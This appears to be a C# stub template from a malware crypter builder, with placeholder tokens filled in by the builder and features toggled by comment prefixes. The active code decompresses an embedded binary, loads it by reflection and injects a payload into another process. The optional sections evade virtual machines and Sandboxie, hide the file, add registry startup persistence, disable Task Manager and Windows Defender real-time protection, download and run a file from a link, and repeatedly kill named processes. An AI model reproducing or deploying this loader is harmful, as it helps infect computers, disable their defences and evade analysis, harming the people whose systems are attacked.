using System;
using System.IO;
using System.IO.Compression;
using Microsoft.VisualBasic;
using System.Threading;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
using Microsoft.Win32;
using System.Diagnostics;
using System.Drawing;
using System.Net;
using System.Net.NetworkInformation;
using System.Net.Sockets;
using Microsoft.VisualBasic.CompilerServices;
using System.Collections.Generic;
[assembly: AssemblyTitle("%Title%")]
[assembly: AssemblyDescription("%Description%")]
[assembly: AssemblyCompany("%Company%")]
[assembly: AssemblyProduct("%Product%")]
[assembly: AssemblyCopyright("%Copyright%")]
[assembly: AssemblyFileVersion("%A%.%B%.%C%.%E%")]
    class %2%
    {
	   [STAThread]
        static void Main()
        {       
		   //Sleep System.Threading.Thread.Sleep(%Sleep%);
	       //Detect Virtual Machine RegistryKey %26% = Registry.LocalMachine;
           //Detect Virtual Machine RegistryKey %27% = %26%.OpenSubKey("SOFTWARE\\VMware, Inc.\\Vmware Tools");
           //Detect Virtual Machine if ((%27% == null))
           //Detect Virtual Machine {
           //Detect Virtual Machine }
           //Detect Virtual Machine else
           //Detect Virtual Machine {
           //Detect Virtual Machine     Environment.Exit(1);
           //Detect Virtual Machine }
		   //Detect SandBoxie %25%();
		   //Hide File File.SetAttributes(Application.ExecutablePath, FileAttributes.Hidden);
		   //Normal Startup %35%();
		   //Disable Task Manager RegistryKey %24%;
           //Disable Task Manager %24% = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Policies\System", true);
           //Disable Task Manager if (%24% == null)
           //Disable Task Manager {
           //Disable Task Manager     Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Policies\System", RegistryKeyPermissionCheck.ReadWriteSubTree);
           //Disable Task Manager     %24% = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Policies\System", true);
           //Disable Task Manager     %24%.SetValue("DisableTaskMgr", 1);
           //Disable Task Manager }
           //Disable Task Managerelse
           //Disable Task Manager{
           //Disable Task Manager    %24%.SetValue("DisableTaskMgr", 1);
           //Disable Task Manager}
           //Disable Task Manager %24%.Flush();
		   //Disable Windows Defender RegistryKey %29%;
           //Disable Windows Defender %29% = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows Defender\Real-Time Protection", true);
           //Disable Windows Defender if (%29% == null)
           //Disable Windows Defender {
           //Disable Windows Defender     Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Microsoft\Windows Defender\Real-Time Protection", RegistryKeyPermissionCheck.ReadWriteSubTree);
           //Disable Windows Defender     %29% = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows Defender\Real-Time Protection", true);
           //Disable Windows Defender     %29%.SetValue("DisableRealtimeMonitoring", 1);
           //Disable Windows Defender }
           //Disable Windows Defender else
           //Disable Windows Defender{
           //Disable Windows Defender    %29%.SetValue("DisableRealtimeMonitoring", 1);
           //Disable Windows Defender}
           //Disable Windows Defender %29%.Flush();   
		   //Download  System.Net.WebClient %28% = new System.Net.WebClient();
           //Download %28%.DownloadFile("%Link%", (System.Environment.GetEnvironmentVariable("tmp") + "\\%Download Name%"));
           //Download  Process.Start((System.Environment.GetEnvironmentVariable("tmp") + "\\%Download Name%"));
			byte[] %4% = {%Razor%};
			byte[] %14% = {31,139,8,0,0,0,0,0,4,0,237,90,121,144,28,213,121,255,94,79,207,76,207,236,193,246,204,158,218,67,179,58,71,236,106,209,106,87,72,96,25,246,66,71,36,33,89,187,72,28,138,81,239,76,239,110,155,217,233,81,79,143,208,66,100,47,200,36,38,128,131,29,39,54,101,131,101,19,254,192,133,99,92,6,223,113,228,64,92,101,59,80,132,56,27,108,83,160,148,29,219,42,170,124,196,56,62,82,70,249,125,175,187,103,102,15,108,170,82,21,87,170,104,109,127,253,93,239,123,223,251,222,247,190,247,186,71,7,110,188,159,66,68,164,226,190,120,145,232,243,228,93,67,244,251,175,121,220,245,171,191,88,79,79,196,158,233,254,188,216,255,76,247,196,140,85,76,21,28,123,218,49,102,83,25,35,159,183,221,212,164,153,114,74,249,148,149,79,141,29,28,79,205,218,89,179,175,174,46,190,206,183,113,232,26,162,253,66,165,175,188,178,225,166,192,238,121,82,186,107,68,13,17,43,69,60,222,223,142,2,164,112,31,247,189,99,92,241,252,38,170,60,233,156,71,60,119,129,197,67,119,17,53,200,191,202,179,252,144,215,49,216,61,232,15,166,154,95,190,206,18,213,146,215,111,199,27,136,73,249,130,127,90,21,169,129,222,83,69,247,185,230,41,23,207,39,214,250,227,90,87,61,136,178,137,227,125,197,172,225,26,68,59,132,231,3,143,153,210,139,245,134,48,234,62,167,232,100,200,31,195,188,175,119,233,50,189,161,62,199,204,217,25,127,76,103,125,189,222,101,122,35,111,108,144,111,94,255,223,175,251,71,189,39,231,166,66,97,122,247,70,162,23,218,137,132,47,63,148,170,212,132,55,114,61,129,251,217,111,252,228,43,220,254,125,184,115,227,115,69,215,156,237,59,108,22,237,146,147,49,139,101,236,176,105,100,77,167,55,53,91,204,216,78,206,154,236,77,29,49,157,162,101,231,223,186,181,111,11,255,235,77,141,150,114,110,201,49,223,154,55,75,174,99,228,122,83,135,74,147,57,43,179,207,156,155,176,111,49,243,111,157,220,190,221,216,150,217,118,121,255,21,3,131,230,150,29,87,172,93,222,89,41,239,90,179,102,192,24,55,93,165,202,217,67,195,99,252,199,62,111,80,210,112,57,46,215,204,165,164,164,195,62,241,137,98,20,216,60,100,106,81,99,140,107,78,49,198,88,136,177,56,99,42,47,221,75,41,185,69,200,245,7,101,157,222,201,77,108,20,177,120,188,135,34,151,6,50,69,202,216,136,93,187,84,22,146,50,54,107,215,45,149,169,82,198,29,217,245,21,153,66,9,200,194,44,83,66,105,224,241,116,50,144,146,244,135,215,121,68,202,211,141,75,109,70,153,255,28,90,43,233,166,106,25,183,209,188,54,205,213,125,33,21,40,38,249,247,98,112,237,141,175,137,154,104,111,156,227,214,19,239,209,122,194,164,196,123,68,149,95,113,214,13,37,232,181,38,140,183,61,114,7,195,32,190,173,126,124,89,119,16,186,53,210,238,237,171,192,182,145,126,241,154,232,189,33,175,143,186,88,111,50,141,166,61,53,158,56,106,119,200,182,81,233,215,145,192,150,82,236,196,227,52,107,144,28,123,136,214,147,172,115,58,181,212,40,33,53,141,102,145,90,173,87,109,137,247,96,244,209,150,133,154,104,123,93,172,255,251,205,126,184,168,125,75,156,238,71,175,117,220,166,185,206,193,192,10,181,9,245,181,38,12,90,73,136,215,154,52,126,170,207,197,130,136,165,87,51,72,113,191,113,158,34,69,123,103,55,8,9,154,87,201,71,99,66,77,136,180,142,174,155,95,19,201,54,189,173,55,82,92,3,254,109,20,90,189,51,141,226,31,79,198,67,122,124,245,170,5,252,121,116,77,234,51,112,230,190,46,36,82,82,211,181,230,148,130,140,122,40,141,13,34,190,202,183,145,74,136,219,49,123,170,174,241,164,75,211,171,244,85,101,211,61,171,169,162,144,92,65,129,116,109,245,166,15,36,99,205,201,40,20,35,172,24,91,181,176,106,33,17,93,149,8,241,164,47,107,161,215,232,81,159,213,29,52,137,114,228,89,115,233,208,136,71,116,200,31,142,206,196,165,11,248,243,232,134,230,100,36,176,80,163,235,41,218,66,180,122,40,221,6,83,201,90,117,115,88,175,109,238,11,53,247,136,22,146,189,181,183,148,213,155,151,106,19,116,151,248,25,88,174,13,233,13,24,74,203,74,67,137,167,126,133,0,47,36,47,129,103,109,11,109,11,233,245,236,87,93,179,94,215,242,157,100,107,50,177,227,94,94,140,250,37,29,11,29,190,207,77,160,186,22,186,124,170,17,212,234,70,159,72,234,141,126,4,184,143,93,122,99,203,119,90,22,238,91,205,147,215,28,210,147,122,115,179,222,252,222,207,165,55,112,94,150,157,211,155,22,116,201,127,29,23,9,29,164,225,32,233,137,150,133,100,66,79,232,173,201,118,189,253,170,233,139,23,47,234,181,233,141,220,113,125,121,230,186,22,244,250,85,175,99,137,131,159,246,93,13,235,17,41,67,220,57,118,218,234,94,120,18,94,168,164,22,11,171,82,171,113,133,172,93,148,90,77,43,185,238,139,211,88,137,145,166,37,194,151,250,211,105,63,16,26,235,108,226,245,115,41,251,214,162,183,216,61,44,106,142,167,113,28,137,191,84,235,61,136,90,228,242,28,246,15,95,219,112,175,197,26,189,30,119,63,201,51,153,224,26,242,22,224,245,178,70,34,223,213,198,52,100,113,44,246,148,3,178,240,92,60,88,177,246,86,128,226,128,44,48,243,172,233,233,123,21,128,107,31,234,16,93,34,237,52,150,249,27,72,153,111,244,74,60,221,88,196,170,142,164,225,70,220,133,174,50,223,228,9,176,127,92,30,236,31,129,157,6,105,167,105,153,125,157,255,210,136,72,196,227,143,140,255,209,136,240,119,92,174,189,39,121,3,220,182,101,251,214,237,36,171,123,14,240,85,152,94,251,78,28,1,97,224,126,220,107,199,93,199,202,79,23,89,227,167,88,176,59,57,46,215,141,83,111,139,119,6,92,187,251,186,189,99,120,238,4,253,17,108,27,107,71,114,246,164,191,237,161,152,138,163,79,126,188,51,134,129,210,111,214,15,80,179,183,223,111,247,251,111,226,246,184,251,112,15,227,62,224,237,105,242,168,168,123,251,13,239,3,60,90,201,11,112,225,237,97,242,169,250,184,183,221,206,215,120,163,139,211,58,241,27,192,235,197,149,34,66,51,194,16,113,58,7,78,132,182,42,140,63,161,252,185,18,161,47,170,6,164,251,194,87,134,35,244,39,225,233,112,61,253,48,252,60,224,193,200,21,145,122,154,145,240,175,34,167,35,17,250,251,200,99,128,47,2,198,169,61,250,42,224,64,52,137,60,152,137,238,139,70,232,193,232,105,192,47,69,217,218,203,81,182,255,43,72,35,180,75,219,168,213,211,141,26,183,157,4,30,161,19,26,235,220,41,225,123,37,252,144,132,159,148,240,105,9,191,46,225,115,26,219,185,160,189,138,182,111,137,245,196,96,33,198,22,238,149,240,227,18,126,82,194,115,18,254,52,246,18,116,34,241,211,209,122,234,142,63,143,17,93,31,127,44,242,25,202,197,121,95,190,61,206,30,126,88,194,47,196,89,115,33,206,173,190,47,241,139,18,174,170,97,56,32,225,126,9,45,64,162,224,140,22,100,206,38,204,95,184,76,141,130,138,1,231,185,110,160,107,65,213,129,10,81,24,226,235,137,247,184,48,246,120,166,166,124,234,18,105,240,14,186,15,84,4,243,204,83,246,215,144,117,130,234,148,212,163,146,138,227,102,205,47,211,215,160,153,148,84,3,189,136,30,54,33,115,82,82,246,67,217,95,51,178,168,159,206,136,20,224,99,98,51,224,179,226,74,192,159,139,221,212,77,79,41,247,99,101,61,173,254,8,240,121,9,95,86,95,1,255,2,96,132,254,83,226,191,84,127,12,40,194,12,99,12,27,46,9,255,12,120,99,248,71,128,93,18,110,148,176,31,80,167,155,194,191,0,124,79,248,215,128,23,195,45,66,235,230,88,68,90,7,69,18,110,53,46,162,82,146,210,91,109,236,52,130,246,75,42,169,157,20,237,160,102,124,234,35,34,13,234,221,62,245,143,98,27,168,179,62,245,61,49,2,234,203,146,218,165,116,42,25,80,47,250,212,6,101,6,145,127,85,82,103,104,187,146,3,213,176,198,147,93,173,156,0,149,150,148,78,123,148,83,160,38,214,120,51,57,165,204,99,142,220,53,21,63,85,154,151,84,72,187,77,185,7,212,185,69,50,185,182,72,63,254,109,229,193,42,234,93,161,79,113,45,244,169,143,130,106,40,83,79,130,74,148,169,175,129,106,44,83,47,134,62,203,165,192,167,186,212,175,226,184,22,80,87,169,255,36,207,127,30,53,174,62,79,107,202,212,93,234,119,105,35,189,32,25,205,244,126,245,60,94,80,107,215,122,227,123,28,84,15,61,189,193,139,217,135,194,191,69,85,169,221,232,81,143,133,21,209,71,235,124,234,243,225,40,168,45,27,43,179,114,25,237,217,88,25,237,101,52,33,169,102,237,146,72,187,184,140,114,126,187,181,146,226,232,173,227,100,167,63,174,130,63,84,184,2,253,82,225,90,20,226,131,53,53,133,184,126,109,8,241,234,219,22,226,51,240,104,136,79,187,7,67,92,199,142,135,184,70,229,66,220,150,79,130,10,125,240,13,227,63,150,248,127,133,184,47,69,190,17,196,84,238,171,81,253,93,210,254,37,82,65,147,42,227,150,202,154,39,164,230,41,169,121,90,13,164,130,62,44,117,206,74,157,71,94,135,243,116,56,70,28,183,27,0,215,11,11,112,80,156,144,28,93,194,57,9,215,73,216,43,225,160,132,59,125,62,231,91,175,132,131,18,238,148,240,14,41,189,91,194,247,1,254,153,120,128,30,139,62,47,218,136,87,64,27,113,230,111,162,103,162,47,131,195,153,254,40,93,136,254,4,56,235,127,26,48,172,140,201,149,191,31,51,119,15,96,167,118,167,178,95,74,191,0,248,126,229,235,244,14,237,111,148,127,166,57,237,19,202,183,233,110,237,71,244,239,82,122,129,30,209,62,5,206,103,180,207,42,23,232,203,218,23,21,33,22,180,175,2,63,175,61,171,232,226,23,218,183,208,234,17,237,59,202,87,41,28,123,25,176,49,134,145,138,182,88,11,181,9,182,208,45,216,219,77,128,241,208,21,128,122,168,141,158,141,181,135,54,209,175,99,221,161,97,244,178,49,244,54,169,121,131,232,139,255,105,232,109,178,95,3,156,139,161,19,128,17,117,78,74,239,144,118,238,150,240,125,18,62,32,225,199,36,124,84,194,79,75,248,5,9,83,168,130,135,197,38,186,135,238,69,126,255,92,220,163,246,81,141,194,240,21,81,4,252,158,248,160,210,71,95,18,53,192,255,91,226,33,133,225,55,69,39,56,63,39,198,159,18,141,192,255,69,236,4,252,174,216,171,14,209,0,108,14,161,250,246,136,81,31,182,211,149,98,47,122,121,80,28,151,61,102,36,39,35,165,22,248,159,22,243,178,213,25,186,93,66,150,158,65,117,58,44,238,134,244,43,226,172,148,62,44,245,31,166,111,82,157,114,78,114,158,146,62,60,37,249,95,7,60,29,58,47,249,223,147,118,46,72,14,206,96,144,146,96,126,74,226,41,137,111,18,247,32,183,135,36,62,36,249,163,168,175,59,67,163,226,97,113,24,56,251,57,42,206,72,200,214,142,75,205,227,82,51,35,216,114,6,250,31,0,100,253,121,41,61,35,245,207,72,253,51,146,127,70,218,57,43,165,231,100,219,115,18,63,47,33,41,210,55,69,250,166,220,2,253,33,9,143,75,56,47,225,89,9,207,73,120,94,66,10,49,76,73,56,228,225,42,247,210,65,173,33,111,135,213,252,157,54,70,69,113,74,156,22,119,138,127,19,223,21,63,16,175,136,223,160,183,247,40,15,42,255,161,92,22,218,30,250,11,252,83,161,27,193,26,142,3,214,160,101,173,60,51,93,47,248,203,227,29,52,1,120,78,220,192,117,79,121,59,224,51,202,135,0,247,133,235,208,193,55,194,9,126,215,142,164,0,183,0,42,168,7,33,249,165,6,175,219,176,22,5,140,194,154,130,253,187,6,176,83,238,243,171,65,41,212,37,225,26,126,177,70,70,36,169,20,187,51,86,162,18,189,135,142,138,183,11,83,228,132,173,156,84,84,68,239,219,10,204,139,245,244,46,30,155,216,72,31,149,207,77,244,164,124,246,208,215,228,115,51,189,40,159,151,81,151,202,207,126,186,74,229,50,59,64,227,146,222,70,119,225,169,206,87,190,30,121,215,125,20,156,3,189,75,200,211,226,226,239,163,113,248,71,203,244,12,81,193,137,222,18,231,58,168,98,212,42,218,242,168,241,162,129,189,173,150,110,82,248,217,38,159,252,145,225,38,229,50,250,5,252,60,237,153,219,121,192,206,150,114,230,85,20,124,107,162,3,86,198,177,139,246,148,219,119,196,42,150,140,220,136,81,180,50,116,96,110,184,80,200,89,25,195,181,236,60,237,42,229,51,140,244,29,152,131,100,212,158,45,148,92,211,1,122,200,177,223,97,102,92,96,71,205,201,113,211,57,105,101,204,34,77,204,56,166,145,29,55,166,204,131,147,44,134,214,73,43,107,58,199,251,105,37,171,4,57,154,21,247,230,167,108,103,214,147,141,187,134,227,150,10,213,172,242,167,172,106,119,42,31,184,224,195,184,233,186,242,77,160,130,194,116,193,116,220,185,149,135,217,87,229,78,217,251,42,30,148,76,234,203,184,182,243,58,237,199,76,175,77,57,36,222,103,55,242,198,141,166,178,237,180,233,222,92,214,152,45,163,139,131,35,181,170,195,51,203,212,18,157,235,138,190,162,68,102,229,99,5,51,213,147,49,123,243,162,201,89,162,93,173,121,205,9,140,171,72,54,237,54,221,61,70,113,102,212,206,154,52,49,87,48,153,33,159,19,182,247,174,69,163,152,96,215,188,249,230,189,249,162,107,228,51,192,176,116,45,159,160,49,171,88,176,139,139,197,236,22,204,4,156,215,137,39,79,156,231,77,223,222,60,66,148,55,114,136,109,158,127,33,56,98,228,74,38,50,136,227,39,25,84,109,206,115,200,79,36,50,42,97,188,214,152,53,41,99,207,206,26,249,236,126,43,111,82,193,211,25,118,49,146,73,76,67,145,92,153,174,85,12,43,63,99,58,22,98,144,207,230,64,102,216,54,76,237,202,25,200,45,51,127,210,114,236,252,172,153,119,41,83,114,28,60,199,44,199,228,137,158,163,98,37,109,131,142,170,83,152,227,40,59,11,134,224,117,13,255,60,242,168,125,235,229,131,203,148,198,151,50,164,218,50,46,127,69,246,3,112,192,156,101,111,124,15,104,18,105,60,156,205,58,18,47,77,77,97,222,189,199,184,117,155,73,147,115,24,51,55,166,163,24,180,185,216,132,20,50,223,53,243,116,173,123,93,126,214,40,28,177,204,91,15,78,141,155,222,226,61,98,97,196,70,110,56,151,179,51,215,156,162,25,25,52,50,252,238,114,102,126,218,157,33,151,179,7,238,184,188,42,176,100,75,179,166,231,60,29,157,49,220,34,230,139,10,6,244,228,47,60,152,45,16,214,36,204,120,83,112,184,132,110,120,250,101,18,250,14,122,34,191,214,248,68,80,72,178,62,27,136,28,34,122,68,90,153,217,126,26,51,139,183,184,118,129,38,44,55,199,73,88,204,148,133,91,81,116,178,123,243,88,154,140,28,44,185,62,118,141,227,216,193,194,174,42,55,1,118,192,200,27,211,136,168,83,161,3,229,221,57,123,210,200,89,183,121,147,239,127,194,151,185,17,40,251,60,185,58,150,26,148,85,195,151,23,171,112,25,137,192,90,208,21,146,96,202,154,46,57,94,87,139,202,154,87,8,101,41,203,154,83,6,218,149,87,13,119,49,230,241,40,120,50,175,92,72,43,72,208,205,108,193,206,35,229,177,141,152,57,186,38,107,33,237,71,28,251,214,162,129,233,42,47,161,165,2,84,115,183,202,213,172,57,102,123,182,172,28,6,186,219,204,155,112,220,204,178,164,98,195,87,31,179,140,233,188,93,116,173,76,17,62,78,150,166,17,155,107,237,60,87,190,197,250,129,112,143,149,205,154,249,10,127,229,74,19,244,94,174,126,240,49,159,53,156,172,183,65,86,154,195,156,233,241,184,148,44,115,111,113,68,176,33,20,173,233,60,237,49,115,133,125,230,220,173,182,147,93,214,194,255,33,102,185,7,190,128,219,154,78,145,139,133,87,172,189,9,247,165,188,4,252,108,247,171,242,46,199,158,245,57,195,88,146,39,13,222,114,188,122,88,169,182,115,187,29,187,84,24,181,115,57,111,217,86,188,226,249,246,122,40,150,177,37,158,202,82,108,23,202,142,194,115,132,210,90,52,227,65,233,61,96,56,197,25,84,109,94,119,7,167,184,120,159,196,254,139,157,227,58,88,25,216,74,128,135,92,135,110,132,65,186,230,84,198,44,200,132,29,177,92,95,19,249,48,97,151,85,1,101,62,242,34,150,236,254,203,105,4,37,137,70,188,50,54,236,56,198,28,141,160,244,220,50,106,23,230,56,36,44,46,146,127,48,25,227,122,130,36,246,73,111,41,239,150,52,123,59,50,135,10,177,207,202,97,147,201,153,134,179,72,203,143,1,202,92,9,229,111,142,198,75,133,2,151,52,46,129,188,64,101,182,6,210,170,44,204,229,246,34,35,28,183,194,186,5,251,152,153,27,216,218,151,69,71,121,23,80,98,216,74,75,25,119,191,49,103,151,170,148,61,122,159,149,207,6,161,28,174,236,85,84,238,92,86,194,195,38,98,96,98,126,253,157,187,92,163,166,252,89,166,225,98,209,156,157,204,205,121,135,139,128,8,50,175,188,240,170,114,180,186,92,140,207,229,51,51,216,235,16,253,108,229,208,85,249,73,209,41,23,67,111,237,45,174,1,30,15,198,120,101,20,253,78,101,77,58,108,230,140,83,18,171,26,154,159,108,163,126,241,183,114,139,194,26,248,190,11,126,251,63,142,86,132,187,75,86,118,185,234,132,99,100,205,89,195,185,101,185,136,115,197,177,166,103,220,229,34,228,64,22,211,178,82,27,56,150,95,193,37,44,249,140,99,21,22,175,170,178,19,188,207,84,216,229,32,114,2,200,207,59,107,240,238,88,32,131,92,154,161,211,252,37,105,253,46,188,151,228,41,3,142,133,179,88,158,250,232,48,97,113,2,47,145,3,62,227,124,253,236,199,23,218,94,232,125,124,248,239,10,55,172,122,92,173,221,77,218,231,110,59,118,164,109,240,252,221,218,227,87,223,252,46,253,95,227,87,134,82,36,248,75,138,74,148,168,141,70,154,18,173,34,81,203,132,230,19,26,19,186,79,232,76,52,250,68,163,170,161,13,3,141,129,206,160,81,197,91,87,7,140,106,106,138,18,77,64,234,149,46,138,54,8,209,133,55,172,232,22,33,68,67,23,191,100,66,156,36,54,212,198,223,230,210,196,31,90,226,74,125,125,107,171,18,107,173,111,208,215,53,232,169,8,41,74,107,167,22,167,176,210,170,53,104,248,243,208,206,48,80,188,209,105,173,154,70,97,134,26,188,20,90,107,148,66,74,125,103,88,81,34,173,74,36,166,68,234,67,145,206,112,40,146,232,198,189,158,93,239,102,176,62,76,66,128,214,152,6,88,15,105,47,11,122,153,234,13,167,132,208,251,181,224,219,112,56,165,136,250,250,22,188,134,29,152,155,48,103,11,200,79,51,186,195,251,209,157,136,95,229,200,143,154,31,47,63,82,65,140,162,28,207,40,199,49,202,241,139,10,25,35,81,223,32,168,6,47,39,229,67,63,37,5,213,131,81,125,190,167,90,65,81,240,228,81,62,80,168,62,143,227,221,78,116,116,132,162,66,193,173,69,72,36,154,244,183,113,31,77,160,235,195,232,163,139,212,56,98,31,142,98,26,20,72,48,9,41,21,3,170,175,199,235,226,160,95,14,96,178,175,124,170,70,122,187,118,198,206,21,251,198,109,163,176,199,117,11,163,57,11,187,87,192,79,44,63,217,39,87,58,206,251,113,73,82,48,201,113,0,14,110,146,98,81,53,73,252,79,225,80,40,97,25,233,72,84,85,52,5,243,42,180,68,19,198,21,195,120,20,158,107,254,228,8,20,83,169,213,82,88,36,230,239,210,248,102,77,176,228,100,158,224,233,143,1,77,24,218,186,104,135,162,167,234,53,125,29,172,117,114,110,104,220,212,187,58,195,208,80,20,45,194,147,60,255,128,247,248,152,210,181,14,233,164,116,116,132,145,180,243,143,68,121,202,249,25,13,37,186,19,221,28,182,196,250,33,65,3,203,254,199,196,132,45,227,228,162,2,78,99,37,163,226,102,3,225,72,201,202,225,245,41,58,24,164,138,38,252,247,117,13,110,206,127,18,127,108,183,247,6,65,251,150,158,63,198,221,82,214,178,251,188,35,18,236,251,21,215,59,57,152,78,153,49,14,144,51,185,224,249,117,218,118,180,254,254,160,67,63,195,202,7,52,242,70,251,36,199,92,131,55,81,25,118,32,222,167,133,46,206,248,9,165,249,168,99,20,112,122,42,239,188,56,39,227,140,38,56,21,203,166,55,9,90,183,35,107,76,101,39,183,237,216,188,245,242,43,178,155,7,7,179,59,54,239,184,98,91,102,115,102,114,203,224,150,1,115,199,64,255,96,134,8,11,39,81,174,165,169,127,120,52,149,218,186,165,127,7,81,29,186,45,191,221,243,245,238,209,202,183,140,135,130,255,191,182,194,117,255,104,53,133,55,61,7,251,233,1,195,202,123,223,43,76,179,92,56,47,174,167,212,208,202,70,254,23,87,240,127,239,120,46,59,16,193,142,227,184,211,68,135,199,199,198,95,104,62,118,245,220,175,110,24,126,232,91,91,127,251,151,63,120,233,33,14,240,232,149,199,120,249,22,143,29,54,110,179,157,99,254,219,197,177,96,236,21,196,158,124,199,49,185,33,150,89,125,133,236,228,239,244,229,205,235,205,235,205,235,255,240,26,242,126,243,127,124,224,15,237,200,155,215,31,226,250,31,63,202,117,67,0,46,0,0,0};
            byte[] %13% = %2%.%6%(%14%);
            byte[] %5% = %2%.%6%(%4%);
            RuntimeHelpers.GetObjectValue(Assembly.Load(%13%).GetType("Function.Application").GetMethod("Whatsapp").Invoke((object)null,new object[3]{(object)%Inject%,(object)%5%,(object)false}));
			//Task Kill %30%();
            }
		//Normal Startup public static void %35%()
        //Normal Startup {
		//Normal Startup int %36% = Conversions.ToInteger("1");
        //Normal Startup if ((double)%36% != Conversions.ToDouble("1") || Registry.GetValue("%Regedit%", "%Name%", (object)null) != null)return;
        //Normal Startup string %37% = Environment.GetFolderPath(%Folder Path%) + "\\%FolderName%\\%Startup File Name%";
        //Normal Startup if (!Directory.Exists(Path.GetDirectoryName(%37%)))
        //Normal Startup {
        //Normal Startup Directory.CreateDirectory(Path.GetDirectoryName(%37%));
        //Normal Startup File.Copy(Application.ExecutablePath, %37%, true);
        //Normal Startup }
        //Normal Startup Registry.SetValue("%Regedit%", "%Name%", (object)%37%);    
        //Normal Startup }
		//Detect SandBoxie [DllImport("kernel32.dll")]
        //Detect SandBoxie public static extern IntPtr GetModuleHandle(string lpModuleName);
        //Detect SandBoxie static void %25%()
        //Detect SandBoxie {
        //Detect SandBoxie     if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
        //Detect SandBoxie     {
        //Detect SandBoxie         Environment.Exit(1);
        //Detect SandBoxie     }
        //Detect SandBoxie }
        //Task Kill public static void %30%()
        //Task Kill {
        //Task Kill     for (; ; )
        //Task Kill     {
        //Task Kill         string %31% = "%Task Kill%";
        //Task Kill         string[] %33% = Strings.Split(%31%, "; ", -1, CompareMethod.Binary);
        //Task Kill         foreach (string %32% in %33%)
        //Task Kill         {
        //Task Kill             Interaction.Shell("taskkill /f /im " + %32%, AppWinStyle.Hide, false, -1);
        //Task Kill         }
        //Task Kill         Thread.Sleep(1500);
        //Task Kill     }
        //Task Kill }
        public static byte[] %6%(byte[] %11%)
        {
            using (MemoryStream %7% = new MemoryStream(%11%))
            {
                using (GZipStream %8% = new GZipStream(%7%, CompressionMode.Decompress))
                {
                    const int %9% = 1024;
                    int %10% = 0;
                    do
                    {
                        Array.Resize(ref %11%, %10% + %9%);
                        int %12% = %8%.Read(%11%, %10%, %9%);
                        %10% += %12%;
                        if (%12% < %9%)
                        {
                            Array.Resize(ref %11%, %10%);
                            break;
                        }
                    }
                    while (true);
                    %8%.Close();
                }
                %7%.Close();
            }
            return %11%;
        }
    }